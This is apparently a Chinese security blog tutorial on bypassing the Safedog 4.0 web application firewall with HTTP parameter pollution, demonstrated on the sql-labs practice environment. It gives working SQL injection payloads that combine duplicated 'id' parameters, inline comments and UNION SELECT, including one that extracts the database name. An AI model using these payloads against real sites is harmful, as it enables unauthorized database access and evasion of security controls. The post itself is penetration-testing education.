Bypass之HPP混淆绕过某狗4.0

释放双眼,带上耳机,听听看~!

我们平时最常见的waf就是安全狗了,绕狗的问题总是会困扰着我们,通常我们都是用内联注释配合截断进行绕狗,这波就给大家讲一下如何通过hpp参数污染来绕过安全狗

首先实验环境

sql-labs

某狗最新的V4版本

 

相信大家对sql-labs都非常熟悉

id=-1 union select 1,2,3–+ 第二关我们通常都是这样操作的

但是有狗该如何操作呢

首先先科普下,平时我们操作的时候经常用

%26来代替&进行注入测试,但是同时&也可以用于覆盖传参

比如

两个传参不一样 返回的结果也不一样 一个是id=1 一个是id=2

但如果这样传参id=1&id=2

第二个传参就会覆盖第一个

 

之前写到,安全狗会认为/**/注释内的为安全内容那么我们就可以尝试构建语句

id=1 /*&id=-2 /*!union*/ select 1,2,3%23

美滋滋 成功绕过

 

稍作修改 查看库名

id=1/*&id=-2 union select 1,/*!database()*/,3#*/

美滋滋

安全独秀圈

分享我上过的一个live课程,如何绕过waf,原理解析以下

2020-4-22 20:45:08

安全独秀圈漏洞

复现YCCMS执行GETSHELL

2020-4-22 22:35:25

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索